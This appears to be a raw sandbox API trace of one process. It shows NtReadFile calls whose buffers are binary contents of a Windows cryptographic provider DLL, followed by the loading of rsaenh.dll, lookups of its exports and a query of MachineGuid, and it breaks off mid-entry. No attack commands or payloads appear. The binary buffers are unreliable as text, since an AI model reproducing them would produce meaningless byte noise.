Buffer => \x00\x00\x8d\x85T\xff\xff\xffP\xe9Q\xff\xff\xff\x89\x8dP\xff\xff\xff\xe9\x82\x02\x00\x00W\xff\xb5H\xff\xff\xff\xff\x15,\x11\x00h\x83\xf8\xff\x0f\x84\xfb\xfe\xff\xff\x83\xf8\x1c\x0f\x82c\x02\x00\x00WWWj\x02W\xff\xb5H\xff\xff\xff\xff\x15<\x11\x00h;\xc7\x89\x85<\xff\xff\xff\x0f\x84\xd2\xfe\xff\xffWWWj\x04P\xff\x158\x11\x00h;\xc7\x89\x85L\xff\xff\xff\x0f\x84\xb8\xfe\xff\xff\x8b\x00\x83\xf8\x02\x89\x03\x0f\x85\x1c\x02\x00\x00\x83{ \x00\x8b\x85L\xff\xff\xff\x8dS\x04j\x07\x8dp\x04Y\x8b\xfa\xf3\xa5t\x14\x83:\x00t\x0f\xc7\x85P\xff\xff\xff"\x00 \x80\xe9\xef\x01\x00\x00\x8bH \x8b@$\xffs\x08\x89\x8d4\xff\xff\xff\x89\x858\xff\xff\xff\xe8\xa6\xe0\xff\xff\x85\xc0\x89C@\x0f\x84q\x01\x00\x00\x8bK\x08\x8b\xb5L\xff\xff\xff\x8b\xf8\x8b\xc1\xc1\xe9\x02\x83\xc6(\xf3\xa5\x8b\xc8\x83\xe1\x03\xf3\xa4\x8bs\x08\xffs\x1c\x83\xc6(\x89\xb5P\xff\xff\xff\xe8k\xe0\xff FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x83\xf8\x05\x0f\x85h\x01\x00\x00C\xeb\xc3\xff\xb5\xa8\xfd\xff\xff\xff\x15\xc0\x11\x00h\x83\x8d\xa8\xfd\xff\xff\xff\x83\xa6\x04\x01\x00\x00\x00\x89\x9e\x08\x01\x00\x00i\xdb\x05\x01\x00\x00S\xc7\x86\x00\x01\x00\x00\x05\x01\x00\x00\xe8*\xd1\xff\xff\x85\xc0\x89\x86\x0c\x01\x00\x00u\x08j\x08[\xe9\x1f\x01\x00\x003\xc0PP\xb9\x94\x00\x00\x00\x8d\xbd\xac\xfd\xff\xffP\xf3\xab\x8d\x8d\xac\xfd\xff\xffQP\xff\xb5\x98\xfd\xff\xff\xff\x15$\x11\x00h\x83\xf8\xff\x89\x85\xa8\xfd\xff\xff\x0f\x84\x00\xff\xff\xff\x8b\x1dD\x11\x00h\x8d\x8d\xac\xfd\xff\xffQP\xff\xd3\x85\xc0t"3\xc0\xb9\x94\x00\x00\x00\x8d\xbd\xac\xfd\xff\xff\xf3\xab\x8d\x85\xac\xfd\xff\xffP\xff\xb5\xa8\xfd\xff\xff\xff\xd3\x85\xc0u\x0e\xff\x15\xc8\x11\x00h\x83\xf8\x12\xe9\xc5\xfe\xff\xff\x83\xa5\x9c\xfd\xff\xff\x00\x83\xbe\x08\x01\x00\x00\x00\x8b\xbe\x0c\x01\x00\x00\x0f\x86\x86\x00\x00\x00\x8d\x85\xa0\xfd\xff\xffPW\xff\xb5\xa4\xfd\xff\xff\x8d\x85\xd8\xfd\xff\xffPj\x01\xc7\x85 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => W\xe8\x13\xfc\xff\xff\x85\xc0u:\x8dE\xfcP\x8dE\xf8PVh\xe4\x1a\x03hha\x1d\x00\x00W\xe8\xf6\xfb\xff\xff\x85\xc0u\x1d\x8dE\xfcP\x8dE\xf8PVh\x04\x1b\x03hhb\x1d\x00\x00W\xe8\xd9\xfb\xff\xff\x85\xc0t*\x8b\xf0\xa1\xa8\x1a\x03h\x85\xc0t
P\xe8Z\xc1\xff\xff\x83%\xa8\x1a\x03h\x00\x85\xfft\x07W\xff\x15\xa4\x11\x00h\x8b\xc6\xe9\x92\x00\x00\x00\xa1\xa8\x1a\x03h\x01\x05\xbc\x1a\x03h\x01\x05\xc0\x1a\x03h\x01\x05\xc4\x1a\x03h\x01\x05\xb0\x1a\x03h\x01\x05\xb4\x1a\x03h\x01\x05\xb8\x1a\x03h\x01\x05\xd4\x1a\x03h\x01\x05\xd8\x1a\x03h\x01\x05\xc8\x1a\x03h\x01\x05\xcc\x1a\x03h\x01\x05\xd0\x1a\x03h\x01\x05\xe0\x1a\x03h\x01\x05\xf4\x1a\x03h\x01\x05\xfc\x1a\x03h\x01\x05\xf8\x1a\x03h\x01\x05\x00\x1b\x03h\x01\x05\xdc\x1a\x03h\x01\x05\xf0\x1a\x03h\x01\x05\xec\x1a\x03h\x01\x05\xe8\x1a\x03h\x01\x05\xe4\x1a\x03h\x01\x05\x04\x1b\x03hW\xff\x15\xa4\x11\x00h3\xc0 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x11\x00h3\xff\xe9\x88\x00\x00\x003\xc0\x8dM\xfc@QPS\x89E\xf4\xff\xd6P\xff\xd7\x85\xc0t]3\xc0\x8d}\xd8\xab\xab\xab\xab3\xc0\x8d}\xc8\xab\xab\xab\xab\x8dE\xe8Ph c\x00hj\x00\xff\x15p\x10\x00h\x85\xc0t6\x8bE\xe8\x89E\xdc\x8bE\xec\x89E\xe0\x8dE\xf0P\x8dE\xc8Pj\x10\x8dE\xd8Pj\x00\xffu\xfc\xc7E\xd8\x01\x00\x00\x00\xc7E\xe4\x02\x00\x00\x00\xff\x15\x80\x10\x00h\x89E\xf83\xff\xffu\x1c\xffu\x18\xffu\x14\xffu\x10\xffu\x0c\xe8\xc3\xe6\xff\xff9}\x08\x8b\xf0t\x179}\xf8t\x12WWj\x10\x8dE\xc8PW\xffu\xfc\xff\x15\x80\x10\x00h9}\xfct \xffu\xfc\xff\x15\x04\x11\x00h9}\xf4t\x06\xff\x15X\x10\x00h_\x8b\xc6^[\xc9\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecQV\x8b5\x08\x1b\x03hWV\x89u\xfc\xe8\x88\xaf\xff\xff\x8b\xf8\x85\xff\x0f\x85\x02\x01\x00\x009F \x0f\x84\xf1\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xc0\x0f\x84\xd2\xfc\xff\xff3\xf6F\x83}\xb4\x00\x0f\x85\xfd\x01\x00\x00\x8bM\xb0\x8dA\x019E\xd4\x0f\x84\xee\x01\x00\x009M\xd4\xffu\x10\x0f\x85\xd8\x01\x00\x00\x8dE\xb8P\xffu\xe4\xffu\x0c\xffu\x08\xe8]-\x00\x00\x8b\xf0\x85\xf6\x0f\x84\xe3\x01\x00\x00\x83}\xb8\x01uj\xffu\x10\x8dE\xbcP\x8bE\xcc\xff0\xffu\x0c\xffu\x08\xffu\xc8\xffs \xe8\x07\xf9\xff\xff\x8b\xf0\x85\xf6\x0f\x84\xb6\x01\x00\x00\x83}\xbc\x00u=\xffu\x10\xffu\x0c\xffwT\xffu\x08\xe8G+\x00\x00\x85\xc0\x0f\x84B\xfc\xff\xff\xffu\x10\x8dE\xacPj\x01j\x08\xffwT\xffu\x0c\xffu\x08\xe8&7\x00\x00\x85\xc0\x0f\x84!\xfc\xff\xff3\xf6F\x83}\xac\x00\x0f\x84\xe8\xfe\xff\xff\xffE\xfc\x83E\xd0\x04\x83E\xdc\x08\x83E\xcc\x04\x83}\xfc\x01\x0f\x86\x18\xfc\xff\xff\x83e\xfc\x00\x8dG<\x89E\x08\x8dC0\x89E\xcc\x8dC8\x89E\xd0\xffu\x10\x8bE\x08\xffu\xd0j\x01\xff FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xd0\x8b\xd9\x83\xe0\x1f\xc1\xea\x05\xc1\xee\x05;\xc3\x89]\xfcr\x1b\x8dK\x01;\xf9\x89M\x18w\x03\x89}\x18\x8b\xc8\x8bE\x08\x8b\x14\x90+\xcb\xd3\xea\xeb\x19\x8dH\x01;\xf9\x89M\x18w\x03\x89}\x18\x8b\xcb+\xc8\x8bE\x08\x8b\x14\x90\xd3\xe2j Y+M\x18\x83\xc8\xff\xd3\xe0j\x1fY+M\xfc\xd3\xe8\x8bM\x10\x8d\x0c\xb1\x8b\xf0\xf7\xd6#1#\xc2\x0b\xf0+}\x18\x891\x0f\x85w\xff\xff\xff^[3\xc0@_\xc9\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecVW\xffu\x0c\x8b}\x08W\xe8\xbe\xfd\xff\xff\x8b\xf0\x85\xf6t\x0f\xfft\xb7\xfc\xe8Z\xfe\xff\xffN\xc1\xe6\x05\x03\xc6_^]\xc2\x0c\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecV3\xc93\xf69M\x0ct\x0e\x8bE\x089\x0c\xb0u\x18F;u\x0cu\xf5\xffu\x10Qj\x11\xe8\\xb7\xfe\xff3\xc0^]\xc2\x0c\x00\xff4\xb0\xe8M\xfe\xff\xff\xc1\xe6\x05\x03\xc6\xeb\xec\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xecQ FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xfc\x839\x00u\x08N\x83\xe9\x04\x85\xf6u\xf3\x8dD\x18\xfc\x838\x00u\x08J\x83\xe8\x04\x85\xd2u\xf3\xffu0\x8b]\xe4\x8dE\x80P\xffu,\x89u\xe8\x8bu\xe0SV\x8dE\x90P\x89U\xec\xe8\x89'\x00\x00\x85\xc0\x0f\x84 \x01\x00\x00\x8bM\x803\xffG\x85\xc9u 9M\x84\x0f\x84\x00\xfc\xff\xff\x8bE,;E\x14\x0f\x83\xf1\x00\x00\x00\x89\x0c\x86\x8bE,\x8bM\x84\x89\x0c\x83\xe94\xfe\xff\xff\x8b}\xf4\x8bU\xb4\xc1\xe7\x02\xc1\xe2\x02\x8bD\x15\xe8\x8bL\x15\xe0\x8dt=\xe8\x8b\x1e+\xd8\x89E\xfc\x8bE,C\x89M\xb4\xe8\xcb\xf6\xff\xff\xffu0\x89E\xf8\xffu\xd4\x8bD=\xd8\xffu\xd0j\x00\xffu\xfc\xfft\x15\xd8\xff6P\xe8\xa1\x11\x00\x00\x85\xc0\x0f\x84\x85\x00\x00\x00\x8bM\xd0\x8b\xc3\xe8\x98\xf6\xff\xff\x8bM\xd4\x8b\xd8\x8bE\xfc\xe8\x8b\xf6\xff\xff\x89\x06\xc1\xe0\x02P\xffu\xd4\xfft=\xd8\xe8\xe1<\x00\x00\x83\xc4\x0c\xffu0\xffu\xd4\xffu FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x8dt\x9e\xfc\x8b\x06;\xc1\x89u\xe8\x0f\x84\xff\x00\x00\x00P\x89M\xfc\x89M\xec\xe8\xe0\xde\xff\xff\x8b>j Y+\xc8\x83\xfb\x02\x89M\xf8r \x8bE\x08\x8bt\x98\xf8\xeb\x023\xf6\x83\xfb\x03r \x8bE\x08\x8bT\x98\xf4\xeb\x023\xd2j\x1f[\xffu\x14+\xd9\x83e\xf4\x00\x8b\xc6\xd1\xe8\x8b\xcb\xd3\xe8\x8bM\xf8\xd3\xe7\xd1\xea\x8b\xcb\xd3\xea\x8bM\xf8\xd3\xe6\x0b\xc7\x8d}\xecW\x0b\xd6\x8b\xf2\x83\xcb\xff\x8d}\xfcW\x8b\xd3P+\xd0\x8b\xcb+\xceRQ\xe8\xa8\xfe\xff\xff\x85\xc0t9\x8bE\xfc\xf7\xe6;U\xec\xc7E\xf4\x01\x00\x00\x00\x89E\xe0v\x03\xffM\xfc\x8bM\xf8\x8bE\xe8\x8b}\x0c\x8b\xf3\xd3\xee+0O;u\xfcsD\x85\xffv\x0f\x8bE\x08\x8bD\xb8\xfc\xeb\x08\x83e\xf4\x00\xebW3\xc0\x8bU\x08\x83e\xe4\x00\x8b\xcb+\xc8\x8bE\xfc\xf7$\xba;\xd6w\x17r\x04;\xc1w\x11+\xc8\x1b\xf2\x89u\xe4\x8b\xf1u \x85\xffu\xbb\xeb\x03 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xfb\xcb\x0f\xd4\xc1\x0f\x7f\xc1\x0f\x7f\xd3\x0f\xdb\xcb\x0f\x7f \x83\xc1\x10O\x0fs\xd0 \x0f\x7f\xc1u\xd19S\x0c\x0f\xef\xc0\x0f\x7f\xc3\x0f\xfb\xd9\x0f\x7f\xd9\x0f\xdf\xcat.\x8bK\x08+\xf1\x0fo\x14\x0e\x0f\xd4\xc2\x0fo\x11\x0f\x7f\xcb\x0f\xdb\xd3\x0f\xd4\xc2\x0f\x7f\xc2\x0f~\xd7\x89<\x90B\x83\xc1\x10;S\x0c\x0fs\xd0 u\xd7\x0fw3\xc0_@^\x8b\xe5]\x8b\xe3[\xc2\x0c\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffS\x8b\xdcQQ\x83\xe4\xf0\x83\xc4\x04U\x8bk\x04\x89l$\x04\x8b\xec\x83\xec8\x8bC\x10\x8bK\x18\x83e\xec\x00\x83M\xe8\xff\x83e\xe4\x00\x83M\xe0\xfff\x0foU\xe0\x89E\xd0\x8bC\x14V\x8b0W\x8bx \x8b@\x1c\x89E\xdc\x8bC\x08\x8b\x10\x0f\xafU\xdc\x83\xc1\x0f\x8b\xc6\x83\xe1\xf0\xc1\xe0\x04\x03\xc1\x85\xf6\x89U\xc8\x89E\xd4tY\x8bS\x08+\xd7\x89E\xf8)M\xf8f\x0f\xef\xc0\x89M\xd8\x89}\xfc\x89U\xcc\x89u\xf4\xeb\x03\x8bU\xcc\x8b}\xfc FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xff\x85\xf6t\x08\x8b\xc8\x8b\xc2\x8b\xd1\x8b\xce\x83e\x14\x00\x85\xd2_u\x0f\x8bU\x18\x8bu\xfc\x89\x02\x89J\x04\xebh\xd1\xea\x8b\xda\xf7\xd3\xf6\xc3\x01u\xf5\xeb1;\xc2\x1b\xf6\xf7\xde+\xce+\xc2\xeb
\x8b\xf1\xc1\xe6\x1e\xc1\xe8\x02\x0b\xc6\xc1\xe9\x02\xa8\x03t\xef\x8b\xd8\xf7\xd3\xf6\xc3\x01t\x0b\x8b\xf1\xc1\xe6\x1f\xd1\xe8\x0b\xc6\xd1\xe9\x85\xc9u\xcb\xffu\x1c\x8dM\x14QRP\xe8
\xfe\xff\xff3\xf6\x85\xc0t\x12\x8bE\x14\x83e\x14\x00\x8bM\x18F3\xd2\x89\x01\x89Q\x04\x8b\xc6^[\xc9\xc2\x18\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x83\xec\x10SVW\xffu\x1c\xffu\x10\xffu\x0c\xe8\xd3\xbf\xff\xff\x8bu\x18\x8b\x1e\xffu\x1c\x8bN\x08\x89E\xf8\x8b\xc3\xc1\xe0\x02j\x00\x03\xc8Q\x89E\xf0\xe8 \xc6\xff\xff\x8b\xf8\x85\xff\x89}\xfcu\x073\xdb\xe9\xbc\x01\x00\x00\x83}\xf8\x00\xffu\x1c\xff6u\x1d\xffv \x8bF,\xffu\x14PP\xe8\xf8\xb3\xff\xff\x8b\xd8\xf7\xdb FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => Data\x002\x00\x00CryptUnprotectData\x00d\x00\x00SHGetFolderPathW\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\xe0\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xe0\x02\x00\xe0\x11\x00\x00\x10\xdf\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00N\xe3\x02\x00\xd4\x10\x00\x00<\xde\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xe4\x02\x00\x00\x10\x00\x00T\xe0\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\xe7\x02\x00\x18\x12\x00\x00\x0c\xe0\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xe7\x02\x00\xd0\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\xea\x02\x00\x00\xea\x02\x00\xe0\xe9\x02\x00\xc2\xe9\x02\x00\xa6\xe9\x02\x00\x8a\xe9\x02\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00FL\x01h\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xdd\xa2,y\xe8!\x05\xd4\x13\x00h\xc0\x13\x00h\xbc\x13\x00h\xa8\x13\x00h\x94\x13\x00h\xbc\x13\x00h\x80\x13\x00hl\x13\x00h\xbc\x13\x00hX\x13\x00hH\x13\x00h FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => m (SHA-1)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00MD2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00Message Digest 2 (MD2)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x80\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00MD4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00Message Digest 4 (MD4)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x80\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00MD5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00Message Dige FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00RSA Data Security's RC4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01f\x00\x008\x00\x00\x008\x00\x00\x008\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00DES\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00Data Encryption Standard (DES)\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 f\x00\x00p\x00\x00\x00p\x00\x00\x00p\x00\x00\x00\x0f\x00\x00\x00
\x00\x00\x003DES TWO KEY\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00Two Key Triple DES\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03f\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\x0f\x00\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtQueryInformationFile |
FileHandle => 0x00000190 FileInformation => \xd0\x10\x03\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtSetInformationFile |
FileHandle => 0x00000190 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00\x01\x00\x00P\x01\x00\x00\x1c\x86V\xe4\x80\xb9\x0fs\x00\x007\x00C\x00A\x00P\x00I\x00:\x00 \x00T\x00h\x00e\x00 \x00i\x00n\x00s\x00t\x00a\x00l\x00l\x00 \x00p\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00c\x00o\x00u\x00l\x00d\x00 \x00n\x00o\x00t\x00 \x00o\x00p\x00e\x00n\x00 \x00s\x00i\x00g\x00n\x00a\x00t\x00u\x00r\x00e\x00 \x00f\x00i\x00l\x00e\x00?\x00C\x00A\x00P\x00I\x00:\x00 \x00T\x00h\x00e\x00 \x00i\x00n\x00s\x00t\x00a\x00l\x00l\x00 \x00p\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00c\x00o\x00u\x00l\x00d\x00 \x00n\x00o\x00t\x00 \x00g\x00e\x00t\x00 \x00t\x00h\x00e\x00 \x00s\x00i\x00z\x00e\x00 \x00o\x00f\x00 \x00R\x00s\x00a\x00b\x00a\x00s\x00e\x00.\x00s\x00i\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x07:\x0e:\x18:%:t:\x81:\x8f:\x9f:\xad:\xbb:\xc9:\xda:\xe8:\xf6:\x04;\x12; ;2;C;Q;\xa0;\xdb;\xe5;\xef;\xf9;\x10<\x17<'<4<M<T<a<l<~<\x85<\x8f<\x99<\xda<\xe7<\xf7<\x01=\x18=\x1f=/=:=Q=X=h=s=\x85=\x8c=\x96=\xa3=\xde=\xeb=\xfb=\x05>\x1c>#>3>>>R>Y>i>t>\x86>\x8d>\x97>\xa4>\xdf>\xe9>\xf9>\x03?\x17?$?4???S?Z?j?u?\x87?\x8e?\x98?\xa3?\xdc?\xe6?\xf6?\x00\x80\x01\x00\xe4\x01\x00\x00\x000\x170\x1e0.090L0W0g0r0\x840\x8b0\x950\xa20\xee0\xfa0\x081\x1e1(181F1W1d1t1\x821\x901\xa21\xaf1\xbd1\xcb102k2u2\x7f2\x892\xa02\xa72 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrLoadDll |
Flags => 1306532 BaseAddress => 0x68000000 FileName => rsaenh.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPAcquireContext FunctionAddress => 0x6800fb46 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPReleaseContext FunctionAddress => 0x6800f017 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGenKey FunctionAddress => 0x6800afb1 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDeriveKey FunctionAddress => 0x6800d086 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDestroyKey FunctionAddress => 0x68009460 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSetKeyParam FunctionAddress => 0x68009638 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetKeyParam FunctionAddress => 0x68009a22 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPExportKey FunctionAddress => 0x6800ba24 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPImportKey FunctionAddress => 0x6800bf8a ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPEncrypt FunctionAddress => 0x68006c8e ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDecrypt FunctionAddress => 0x68007100 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPCreateHash FunctionAddress => 0x680074ba ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPHashData FunctionAddress => 0x68007e56 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPHashSessionKey FunctionAddress => 0x68007fa0 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDestroyHash FunctionAddress => 0x680082d1 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSignHash FunctionAddress => 0x6800da22 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPVerifySignature FunctionAddress => 0x6800df0a ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGenRandom FunctionAddress => 0x6800d7a7 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetUserKey FunctionAddress => 0x68009562 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSetProvParam FunctionAddress => 0x68009e6d ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetProvParam FunctionAddress => 0x68009f9c ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPSetHashParam FunctionAddress => 0x6800a56f ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPGetHashParam FunctionAddress => 0x6800c891 ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDuplicateKey FunctionAddress => 0x6800aaae ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CPDuplicateHash FunctionAddress => 0x6800852e ModuleHandle => 0x68000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExA |
Handle => 0x00000194 DataLength => 37 ValueName => MachineGuid Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExA |
Handle => 0x00000194 Data => b51826f3-5572-4e89-93ff-88d625747e04\x00 ValueName => MachineGuid |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Offload |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
